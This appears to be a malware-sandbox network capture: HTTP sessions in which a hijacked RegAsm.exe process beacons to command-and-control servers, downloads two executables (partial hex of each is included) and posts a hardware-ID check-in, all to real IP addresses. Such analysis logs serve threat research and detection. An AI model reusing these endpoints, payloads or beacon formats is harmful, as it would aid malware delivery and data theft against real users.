pFsDtGuXRhfHOkVPDYdUq/1CWlJau+oKigZ09tDMtrnq6JFavZ/ojvV179+w9l55FUGg7zXPgZy0A3kDi9rfqLIUjp4O6GJLBRrBax0gwl0=
Oct 2, 2024 09:41:13.576723099 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 41.216.188.190
Oct 2, 2024 09:41:13.576723099 CEST	133	OUT	Data Raw: 64 61 74 61 3d 64 38 6c 5a 4e 4e 6f 5f 72 35 31 79 66 42 75 36 75 73 64 59 6f 75 36 74 66 67 6f 78 6b 52 4e 58 31 61 78 31 52 54 66 33 62 4f 62 78 53 2d 64 67 72 44 35 67 6b 6b 37 6f 4c 69 65 31 4e 76 55 43 6d 35 54 4d 5a 6e 6a 39 57 36 63 57 71 Data Ascii: data=d8lZNNo_r51yfBu6usdYou6tfgoxkRNX1ax1RTf3bObxS-dgrD5gkk7oLie1NvUCm5TMZnj9W6cWqLy59-8sRtsIUwwWei6mC-SCLIxSkezwSiu1WfYwudAOWycp23pV
Oct 2, 2024 09:41:15.121012926 CEST	682	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 428 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 70 31 51 2f 7a 7a 71 7a 52 68 41 6a 53 33 44 67 4d 45 63 41 67 31 53 34 7a 2f 45 45 39 31 77 46 4c 35 42 61 51 34 62 39 32 4d 49 63 36 32 61 61 33 35 70 48 4a 78 47 67 63 2f 78 4d 49 55 62 51 68 2b 4c 6a 6a 33 43 47 69 56 59 4e 64 5a 75 43 4d 6c 2b 63 57 34 56 31 44 7a 79 64 4e 51 52 32 59 42 42 78 5a 63 30 62 7a 33 7a 53 31 38 7a 44 6c 58 4f 67 74 58 30 45 7a 53 49 6f 71 52 78 51 43 7a 63 56 67 66 56 51 47 64 47 77 44 36 4c 70 30 74 79 77 75 37 52 38 75 4e 4f 44 78 67 6e 49 67 57 66 32 52 36 4e 44 45 67 4f 2f 44 4e 4a 65 56 64 37 69 39 30 64 35 79 61 65 45 63 62 4f 5a 4d 59 63 67 6d 2f 71 4e 77 54 55 57 79 35 6f 37 65 43 6d 47 6e 6a 30 37 6e 47 64 6a 7a 48 70 74 71 43 45 6c 45 34 72 78 49 37 52 39 69 2f 56 67 4d 70 53 49 41 35 6e 52 78 65 4d 4b 77 54 47 51 32 71 64 5a 49 48 72 4f 74 32 56 75 61 30 39 31 77 56 31 67 79 2b 72 71 55 78 70 39 48 55 63 43 36 50 35 71 7a 5a 4c 67 58 6c 33 59 4e 47 6b 4d 55 66 7a 78 65 37 6f 79 36 49 35 2b 74 2b 6a 39 30 57 30 49 2f 66 73 36 48 47 73 46 2f 70 4e 32 70 [TRUNCATED] Data Ascii: Np1Q/zzqzRhAjS3DgMEcAg1S4z/EE91wFL5BaQ4b92MIc62aa35pHJxGgc/xMIUbQh+Ljj3CGiVYNdZuCMl+cW4V1DzydNQR2YBBxZc0bz3zS18zDlXOgtX0EzSIoqRxQCzcVgfVQGdGwD6Lp0tywu7R8uNODxgnIgWf2R6NDEgO/DNJeVd7i90d5yaeEcbOZMYcgm/qNwTUWy5o7eCmGnj07nGdjzHptqCElE4rxI7R9i/VgMpSIA5nRxeMKwTGQ2qdZIHrOt2Vua091wV1gy+rqUxp9HUcC6P5qzZLgXl3YNGkMUfzxe7oy6I5+t+j90W0I/fs6HGsF/pN2pn4E6T26P9y++OYqw3YDgelFBF0CDghuyo4ioKtboaiiKZOoT2d70WMvfee/bCqhUYHo1IPH4p8ZBdqjXXKCjh5z88=
Oct 2, 2024 09:41:16.886748075 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 349 Host: 41.216.188.190
Oct 2, 2024 09:41:16.886749029 CEST	349	OUT	Data Raw: 64 61 74 61 3d 78 78 4d 6b 64 61 41 73 73 39 4a 59 64 64 5a 50 4b 46 31 68 73 64 6c 4c 35 67 5a 33 45 58 70 69 4d 2d 2d 7a 73 53 52 65 48 66 30 55 55 2d 72 76 78 4a 66 4b 37 64 52 4a 77 4f 78 78 34 48 76 6a 46 6c 30 54 47 41 46 34 38 47 68 6a 30 Data Ascii: data=xxMkdaAss9JYddZPKF1hsdlL5gZ3EXpiM--zsSReHf0UU-rvxJfK7dRJwOxx4HvjFl0TGAF48Ghj0cIYso7TTCwU61SYBAjYJxbSKVbuz2hzy0B-ux9_cRJ2jlviMRSuz4uSyKoKq-3fKaTKf-12J4O6H2KJlHYd31f5ZUCV-7jdmToBlC9p4iWoPg-_-yGPrRNbgvFJqbwT8I0tUXUs0mOQjmIiw14FQfLqRfo4mNKg_b
Oct 2, 2024 09:41:18.122143984 CEST	362	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 44 2b 64 38 4d 70 48 35 37 61 42 6c 6c 7a 6b 43 48 41 65 6e 55 4e 72 4e 70 35 4f 2b 4f 43 68 56 31 50 57 78 59 4e 62 36 31 64 6a 6c 47 44 75 35 47 2f 30 56 62 2f 6f 37 50 53 31 51 4b 35 4f 6c 36 65 42 32 36 69 6a 38 31 51 65 47 45 54 42 4b 4e 53 53 59 72 2b 72 33 59 38 77 38 4a 33 4c 6b 62 55 57 43 67 68 4a 6e 50 39 77 3d Data Ascii: D+d8MpH57aBllzkCHAenUNrNp5O+OChV1PWxYNb61djlGDu5G/0Vb/o7PS1QK5Ol6eB26ij81QeGETBKNSSYr+r3Y8w8J3LkbUWCghJnP9w=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	147.45.44.104	80	7856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:15.213643074 CEST	217	OUT	HEAD /prog/66fbfcc301a31_swws.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:41:15.861479044 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:15 GMT Content-Type: application/octet-stream Content-Length: 344992 Last-Modified: Tue, 01 Oct 2024 13:44:35 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfcc3-543a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Oct 2, 2024 09:41:15.864429951 CEST	216	OUT	GET /prog/66fbfcc301a31_swws.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:41:16.056261063 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:15 GMT Content-Type: application/octet-stream Content-Length: 344992 Last-Modified: Tue, 01 Oct 2024 13:44:35 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfcc3-543a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ec 04 00 00 06 00 00 00 00 00 00 ee 0a 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 d7 37 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 0a 05 00 53 00 00 00 00 20 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 1d 05 00 28 26 00 00 00 40 05 00 0c 00 00 00 60 09 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ `7`S Bx(&@` H.text `.rsrcB @@.reloc@@BH@ +>J]y 9=5tS4;g/kTl>GPOCB$!xVX,7DqRY\8`Mc6`D6bye>Ty"lZD;6FN6T^:z_'_r;n8Ua<D84OvZ2j;o9;a}yR\`2fvJC*Dcu'^,bF^IeHN!&xD"5zJsEHb&DI9Zl{,wF-
Oct 2, 2024 09:41:16.056305885 CEST	1236	IN	Data Raw: 4f d7 1f fa 1d 32 c5 a8 fe 87 41 6b a4 38 d5 3c 8c 21 40 40 61 27 1e d4 db 32 9a 0c c8 41 e5 09 15 18 25 d2 6c 0b 8f 3f 1e 61 3c 79 88 d3 b2 af 82 f8 36 7a 5a b0 04 ae 02 db 27 fb 16 37 d5 f7 51 b2 ce 8e d2 ee 8c 76 3e 83 58 84 36 82 1b 2f a2 64 Data Ascii: O2Ak8<!@@a'2A%l?a<y6zZ'7Qv>X6/db xzYCy:Oo@5vNd\|kOPP]RO7NkBIRD4$b@Ae# =<<_m?ORix9#ICNZPgDB0uo(6>A4VH j
Oct 2, 2024 09:41:16.056324005 CEST	1236	IN	Data Raw: 60 fb c3 81 c3 d1 04 9f 4d 0e ac be 20 5b 52 55 c4 05 dd 77 5c da 5d 3a 09 2b 0a c8 18 c3 0c 59 e2 41 c2 15 7f ea d6 75 d9 ae 9d 9b e0 5e 70 0c 66 d2 ba 0a b3 ac ac ac bb 09 ce b8 4a 2a ff ac b6 16 79 70 6c b6 d4 1f ce 1e 7e 08 31 96 e0 23 f2 d8 Data Ascii: `M [RUw\]:+YAu^pfJ*ypl~1#Yjvc93H1S=6{835ZbmH='Yf'NKr;9+:]bD)A3\|%om1<<(_{6DvN+,'KQDQJxl
Oct 2, 2024 09:41:16.056369066 CEST	1236	IN	Data Raw: 14 d0 75 a1 0a 7a cc 0b ae 26 fe 3d 48 b4 08 a1 4e 12 42 cd 06 80 ef fc e7 3c cc d4 de 79 88 ed c4 7c 41 64 00 52 ee 40 d0 25 4e c2 98 20 76 e2 3f c2 1c 97 c9 0b 9b f6 2e 66 9d e8 6a 40 f1 88 ba 9c cb fb bb 0e f7 6f ce d7 c1 6d 97 e1 78 c3 0b ff Data Ascii: uz&=HNB<y\|AdR@%N v?.fj@omxSxf:-$`/<>Gv yUN uMx/`n,q(}W5@lI\|Dj9!K@'6x.\|\|jGt2<tK'(\"+*.
Oct 2, 2024 09:41:16.056385994 CEST	1236	IN	Data Raw: 71 e7 d0 34 88 49 88 08 72 6f 2c 7d 90 ca 70 3e 15 14 73 1d b6 59 c9 e4 6e 4e de bf 95 48 3b 9c de 17 1e 56 f5 a2 64 40 6c 90 e4 1e 29 df 4c 6f a7 04 95 5d 15 79 d6 39 b0 31 21 ab 2e d7 d0 17 2f c7 bb 52 55 61 7d f1 b8 13 fe de 4d 07 c4 8a e3 9c Data Ascii: q4Iro,}p>sYnNH;Vd@l)Lo]y91!./RUa}MTu%D:I..g@t&vi2-Jk~FE7Oo#^P\50MZ~N!f5)aWK\Gk>QW'fP"ZkUlZv!
Oct 2, 2024 09:41:16.056395054 CEST	1236	IN	Data Raw: a6 94 92 10 93 93 fd 90 73 55 39 c2 f5 63 85 a4 c6 44 15 f1 79 d9 39 cb a4 63 5e 06 8b 9a ba 7c 6f d8 45 89 24 c6 9e 83 d8 ae 0b 96 fd 93 2b fe ae 94 b8 68 2b e9 49 44 fd 89 99 e6 96 ea be 4e 79 b4 78 e8 48 6f df 35 e1 48 02 51 95 77 e3 d3 2e ff Data Ascii: sU9cDy9c^\|oE$+h+IDNyxHo5HQw.~a$C@~y'@-T+qbu8?HD^lc_GFIsEVT9-V&j:.(VI%}V:-x{o5k'>X^st
Oct 2, 2024 09:41:16.056402922 CEST	1236	IN	Data Raw: d3 75 c4 9e a1 df 31 15 3c de 2e 30 d7 72 18 4b 5c a9 19 07 f3 f0 c3 a7 5e bd bf 45 6a de 4a 53 78 31 cc d8 38 20 fa f8 12 55 af ba b9 2a e9 4d 95 f8 06 1c 9e ea 96 91 62 b1 91 15 bd fe 64 c8 1f 06 b9 f1 d4 5f d0 fc 01 90 fc 7d f8 60 c3 4d 9f ed Data Ascii: u1<.0rK\^EjJSx18 UMbd_}`MbKkFK;n{FEI%V'@.Rb!w<06xA "M?%t_e61# H*_Yy4GZr7fumlprgb{t)]OX
Oct 2, 2024 09:41:16.056473970 CEST	1236	IN	Data Raw: b3 64 cd df f7 d1 62 31 3e 8c e1 cf 19 04 41 a8 bf 0c b9 a4 4e 12 73 09 82 91 21 6a eb 0f 4f 7e 21 fa 39 0e 5b 3f 5c e2 fb 48 1a c4 f9 5f 9b ac fc 30 26 5e 4b f3 38 a3 16 3e 98 33 fd 9b 47 fa 71 1a ae 6b 95 03 2c f8 86 c8 c3 1d 33 5f 01 d2 7c a6 Data Ascii: db1>ANs!jO~!9[?\H_0&^K8>3Gqk,3_\|JhKNd,5-vipWWj[?%0bK~WP{:{\|ORW4(WR$(i4dEI4%*3>t0r.\mxJ&/1m+FKq
Oct 2, 2024 09:41:16.056490898 CEST	1236	IN	Data Raw: 80 fe 09 7c 67 6b de fc 99 7e 6c 2b 8b 37 5e 5b e8 7e 43 84 bc 0f 09 32 20 c9 71 db 75 c1 2e 01 85 7f 46 88 7d 03 d6 ea 92 65 30 eb 7e 31 67 ee 1d 16 a0 16 c7 8c 2d ad e2 56 d4 c9 2c bf ab d1 97 ea 5e eb a3 4b 35 70 41 39 97 73 e4 5d af cb 30 ac Data Ascii: \|gk~l+7^[~C2 qu.F}e0~1g-V,^K5pA9s]0+0q=HdriNyk6fFZmxs6 +\|W(\4MA@9OZKfkSs:k1"/sr03+-2}tH4
Oct 2, 2024 09:41:16.056509018 CEST	1236	IN	Data Raw: 1d 01 71 55 af eb 5e dd a7 9d 55 dd 36 85 a4 d2 31 f2 d7 67 48 46 5b 4f 47 8c dd a3 6e fa fe a7 b9 7e 4d 5a 15 f7 67 79 92 1c 39 ba 30 ef 00 32 b0 6e 60 32 98 cb 51 56 6a 9b 7a c9 90 a0 71 6e 99 41 3f ce 5c 94 dc b2 fc dc f9 da 83 02 15 e4 c9 47 Data Ascii: qU^U61gHF[OGn~MZgy902n`2QVjzqnA?\G"GQ4-:\j2uW+_<(;PqhA`2xXj%^r-Aw.zy\|YH-n<s.s( :VyG81<o
Oct 2, 2024 09:41:16.057142019 CEST	1236	IN	Data Raw: ac b2 47 2a 71 80 ed 3d 94 e4 72 59 77 59 d4 87 ff 52 e8 3b d7 e5 f4 3c fa da 13 89 ca fd d8 32 2b 45 71 02 12 01 11 d2 ae 65 e3 a1 b0 9a 12 9f a3 b3 2a 08 4c ca d8 73 c0 ab 43 80 57 8d 65 13 07 0a 32 74 1a 27 73 2f 4d df 64 08 bc dc b7 2c 33 30 Data Ascii: Gq=rYwYR;<2+EqeLsCWe2t's/Md,30r_KTlcq><>hpAyk#gU-0NoIY^Urbe^^J`Oua:Jv.tIPfLz;,$[+-r \|#'D3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	147.45.44.104	80	7856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:15.214256048 CEST	221	OUT	HEAD /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:41:15.854044914 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:15 GMT Content-Type: application/octet-stream Content-Length: 423840 Last-Modified: Tue, 01 Oct 2024 13:44:45 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfccd-677a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Oct 2, 2024 09:41:15.854784012 CEST	220	OUT	GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:41:16.056051016 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:15 GMT Content-Type: application/octet-stream Content-Length: 423840 Last-Modified: Tue, 01 Oct 2024 13:44:45 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfccd-677a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 20 06 00 00 06 00 00 00 00 00 00 ee 3e 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 a1 95 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 3e 06 00 53 00 00 00 00 40 06 00 42 02 00 00 00 00 00 00 00 00 00 00 78 51 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 60 3d 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0f > @@ `>S@BxQ(&``= H.text `.rsrcB@"@@.reloc`&@B>H@+ B,Je8Xf3Zmv$:rXM6'4,OT!BC\|[{2yd?1d2mU5A93B[ltP3fAyz$[Yi[v\Bqg^pd{t}y[PvyH @'2^4h7!OwJxiv?G6^`q8NZ-TuW1zK_7-H<fz(7-@{%xB#"S4
Oct 2, 2024 09:41:16.056076050 CEST	1236	IN	Data Raw: ea 2c 4e af 9d f1 ad fe a3 ce 11 d4 91 82 69 4f dc df 93 1b de fd c1 23 54 b7 a1 91 d5 00 dc 6a 4e bc 46 c3 41 19 10 12 ed ba 0a e8 68 cc 6a be 05 70 86 96 cb 22 26 d3 78 55 2d e0 cd d2 60 0b 8d 08 c2 34 c9 af 91 0e e8 a2 32 2a c0 e6 26 eb f8 48 Data Ascii: ,NiO#TjNFAhjp"&xU-`42&H_\Jn@ #}&rx!F$N/Xisx0+aNux#YD;X@c_a)\|i-?so-f/nkj/8{,jyweJ
Oct 2, 2024 09:41:16.056093931 CEST	1236	IN	Data Raw: 59 3c 7e 25 7f ff 0c cd 0a e6 cf f9 f5 6f 25 ec 4e 1d 9f c5 4b 70 3f 62 b1 1c 03 8c 71 f9 fb 6a c6 ba e7 02 26 de 61 9b 64 af c8 cb 28 66 e8 63 47 8b e7 7b 56 64 29 10 12 c9 77 b2 f7 20 c0 86 1d c2 d6 a7 97 c7 a6 7e 39 23 f0 bc a6 a2 10 5a 77 3c Data Ascii: Y<~%o%NKp?bqj&ad(fcG{Vd)w ~9#Zw<e%P]"3bYdgP'T\|Y}!S4E~R%?[_7B$+Ne<knB{'sUvz2G7O,]9xntxBZpg%}]L'k
Oct 2, 2024 09:41:16.056108952 CEST	1236	IN	Data Raw: 07 bf de da 93 24 11 b8 3f 40 f5 d7 92 05 78 2d f1 f7 eb 9d 89 32 e9 e2 50 4f b3 63 b0 08 40 cd ad 76 67 c5 63 ff 7f 38 51 f8 ad 40 7d 72 a9 2e b7 43 c0 11 74 ef 63 21 5d 6f d8 d5 31 e8 f2 0c 73 ea 8f 4a 71 9e ec 6a b9 c2 58 0f 2d 74 21 91 0d c3 Data Ascii: $?@x-2POc@vgc8Q@}r.Ctc!]o1sJqjX-t!HM\|N^wVGy_"}ra]8X@)w_`@UA^k?nU7 L`kTM5I,KLiP6:XLTyJ[f2:-Q+Zs:JQ
Oct 2, 2024 09:41:16.056127071 CEST	1236	IN	Data Raw: cd 5e 11 17 46 fe ee 2c 9c ea d6 83 39 ab 1c be bf 5f db 51 1f 64 a6 19 c9 f6 39 95 ef 3c 9a d3 be 05 33 c6 28 a8 5a 04 2a 90 b7 3f 58 1d ec c1 8d 9a d7 6d cb 79 cc 70 1a f5 f4 f0 c4 66 24 04 95 78 6e 9c a9 94 63 a8 f6 38 38 4a d4 c6 21 7c 10 89 Data Ascii: ^F,9_Qd9<3(Z*?Xmypf$xnc88J!\|_ht!-eDYDx]R-Cz<ozA_ny6h?ji[]hO&P6j+c+vS7V,j.oH_rD.N_~)wT
Oct 2, 2024 09:41:16.056143999 CEST	1236	IN	Data Raw: 80 f3 49 99 ae 5e c7 6c 8c 2a 9d af f4 11 2e 06 51 77 2e 43 44 73 03 a8 1b be 56 a6 4a 31 10 12 75 d6 bf 8a 7a a5 a0 26 dc af ac e2 36 d4 b9 aa d3 ba 30 eb 1b 1d a4 a9 e9 7f 20 37 f0 a1 48 ca c7 a3 d1 5b 15 c5 27 fc f3 ed fa 4e cc 2f eb af 7d 44 Data Ascii: I^l*.Qw.CDsVJ1uz&60 7H['N/}D?tVg3p(rO)5kR`LW\|78.m6+"ixJ/!"I#\1c<1t&q7%rEsms?a6
Oct 2, 2024 09:41:16.056159973 CEST	1236	IN	Data Raw: 17 77 bc e1 a9 31 10 03 ee f9 6b d8 fd b5 43 48 e7 ef 07 ba 26 35 4c 43 b2 4f e4 d5 08 5a d1 33 44 ff ff 55 c3 b0 97 86 0e b9 6b 8e d9 9b f9 3b c0 bc 0f 98 70 6d f4 f6 8d 99 d6 9a 21 f8 eb cb a3 9e ff f9 67 3b 2d a2 dc c3 b0 ec 1f c1 c5 ae 12 fb Data Ascii: w1kCH&5LCOZ3DUk;pm!g;-[hsufM(bjRD=rRsLG-rvLZQZCTINf^i&ZK^d[?>FD.Z`CDu)945pY@d^uqTXS}FK
Oct 2, 2024 09:41:16.056176901 CEST	1236	IN	Data Raw: b3 3d 3f a9 7f 20 a3 20 30 9c 74 e6 6a 48 0d 6c 44 dc 77 29 f3 a8 99 0f 27 23 63 07 20 be e3 9b 36 52 f6 46 86 59 5c cc 71 76 86 2f 88 87 59 1e ba c1 8b 7f 05 73 a1 72 d4 d6 7d f8 41 c9 7c 83 dd 86 d0 c2 30 12 01 81 c2 cb 38 5f 43 38 7f 52 dc 6b Data Ascii: =? 0tjHlDw)'#c 6RFY\qv/Ysr}A\|08_C8RkW7C\|h+s[yC7$g%?0t5G""-$,=Jsv<CbPA_;;YI.'>e5x~UQ"V)L`#XvB
Oct 2, 2024 09:41:16.056194067 CEST	1236	IN	Data Raw: 66 cc 64 4e 9a 26 51 25 de 33 71 c7 f5 96 e4 c9 a6 a9 19 65 57 56 d9 8e ee db 50 a6 30 7d 31 cd c9 e4 e4 9c d1 38 00 2b cc 78 c4 b0 e7 e8 74 67 26 35 aa 4a 29 ae fb 71 d6 b6 ec b9 51 96 32 9b 48 b9 f7 f3 84 a1 ca fe d7 c9 b2 d0 be 5a 57 3a e2 e3 Data Ascii: fdN&Q%3qeWVP0}18+xtg&5J)qQ2HZW:5DLg~b>pY,cJo[FoE\Up=WL1k5}J]<!KyvSKxda>NP_:E"Hc7"2)m,G(j+[tr30o
Oct 2, 2024 09:41:16.056212902 CEST	1236	IN	Data Raw: e0 43 5f db 30 3d bc c5 11 d5 31 5b 12 98 55 1f 9d 58 f1 37 88 16 35 11 31 51 b6 e3 f5 8f 63 62 00 b4 51 45 67 c6 d4 e7 df c5 7d 55 0a 0a 74 63 c6 95 9f 7f 2c 98 68 55 51 21 0c 9a 94 e7 d3 f6 35 e0 2a 25 3c 10 86 ff dc e1 34 df b6 ab 6c 17 a2 8b Data Ascii: C_0=1[UX751QcbQEg}Utc,hUQ!5%<4l"12nO7&wvP+WWmUN;~K'{#Sys@Sb!Ve]!F,"p9A*eG}RX8mdP$gl
Oct 2, 2024 09:41:16.056648970 CEST	1236	IN	Data Raw: 16 79 ef d7 3d 26 1d e2 ef 66 b8 64 0c 20 a0 89 80 4f 90 f5 c3 bb cb 5f c1 12 03 60 28 17 ad c6 7a 19 c5 6a 18 e2 ca f7 59 85 9d a3 a0 4d 52 08 54 63 13 06 1e 35 58 ec 5b 12 07 50 63 4e 31 be 1e 5d f7 50 f1 56 ec dc 54 49 15 62 15 76 e8 bc 24 a5 Data Ascii: y=&fd O_`(zjYMRTc5X[PcN1]PVTIbv$]<k%]V\Qp[aWEh\!1X(3Dg=1<GfoniFqx$2/8{r8cMp~N7)XmN<ONWV^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	46.8.231.109	80	3128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:19.570255995 CEST	87	OUT	GET / HTTP/1.1 Host: 46.8.231.109 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:41:19.979541063 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:20.081819057 CEST	413	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAA Host: 46.8.231.109 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 2d 2d 0d 0a Data Ascii: ------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="build"default------AFIEGIECGCBKFIEBGCAA--
Oct 2, 2024 09:41:20.409543991 CEST	407	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 44 5a 6b 4d 47 55 78 4e 6d 45 34 5a 6d 56 6d 4d 47 4e 6d 5a 44 51 77 4d 44 59 35 5a 6a 64 6c 4d 32 51 79 59 6a 56 6d 4e 6a 41 77 5a 54 46 6c 5a 54 6b 79 4e 54 51 33 4e 54 63 77 4f 57 56 6d 4e 7a 51 34 4f 54 67 7a 4e 6a 56 6b 4e 7a 63 79 4e 54 41 7a 59 57 49 79 59 57 4a 69 4e 7a 63 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 